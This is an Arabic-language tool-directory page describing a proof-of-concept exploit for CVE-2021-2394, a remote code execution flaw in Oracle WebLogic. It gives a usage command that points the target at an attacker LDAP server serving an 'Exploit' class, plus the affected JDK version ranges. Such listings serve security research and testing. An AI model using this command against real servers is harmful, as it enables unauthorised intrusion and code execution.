Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/lz2y/cve-2021-2394
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHublz2y/cve-2021-2394

CVE-2021-2394

استغلال إثبات المفهوم لـ CVE-2021-2394، وهي ثغرة تنفيذ التعليمات البرمجية عن بُعد في خادم Oracle WebLogic. يستخدم إلغاء تسلسل LDAP أو RMI لتسليم حمولة.

عرض المستودع
40203منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-2394

POC لـ CVE-2021-2394

  • إخلاء مسؤولية
    • المشروع مخصص للتعلم فقط، أي عواقب أو خسائر مباشرة أو غير مباشرة ناتجة عن اختبار غير مصرح به تقع على عاتق المستخدم وحده
  • ملاحظات

    • POC يستخدم IIOP لإرسال الحزم، يرجى إضافة التبعيات ذات الصلة (تم إصدار تبعيات الإصدار 12.2.1.3.0 في الإصدار)
    • يرجى استخدام إصدار منخفض من JDK لتثبيت Weblogic للاختبار

      بالنسبة لطريقة الاستغلال القائمة على RMI، يقتصر إصدار JDK على الإصدارات قبل 6u132 و7u131 و8u121. في الإصدار 8u122 والإصدارات الأحدث، تمت إضافة آلية القائمة البيضاء لإلغاء التسلسل، وتم تعطيل التحميل البعيد للكود عبر RMI بالنسبة لطريقة الاستغلال القائمة على LDAP، يقتصر إصدار JDK على الإصدارات قبل 6u211 و7u201 و8u191 و11.0.1. في الإصدار 8u191، قامت Oracle بتعيين قيود على متجه LDAP، وأصدرت CVE-2018-3149، وأغلقت تحميل الفئات عن بعد عبر JNDI من: https://www.freebuf.com/vuls/279465.html

    • إذا تعذر إعادة الإنتاج في بيئة افتراضية، يمكن الرجوع إلى https://xz.aliyun.com/t/7498
  • طريقة الاستخدام:

    • بدء خدمة ldap
    • java -jar CVE_2021_2394.jar rhost rport ldapurl
    • مثال: java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit
  • روابط مرجعية:

    • https://mp.weixin.qq.com/s/onoMpyenDkMmsoGEw8VO2A
    • https://github.com/Y4er/CVE-2020-14756
    • https://github.com/Y4er/CVE-2020-2551
  • التحديثات

    • 2021/8/15 إزالة بعض الأكواد غير الضرورية
  • مقال تحليلي

    • https://mp.weixin.qq.com/s/AxJJxbkclr4ijXX8lpNAfw
تنزيل الأداة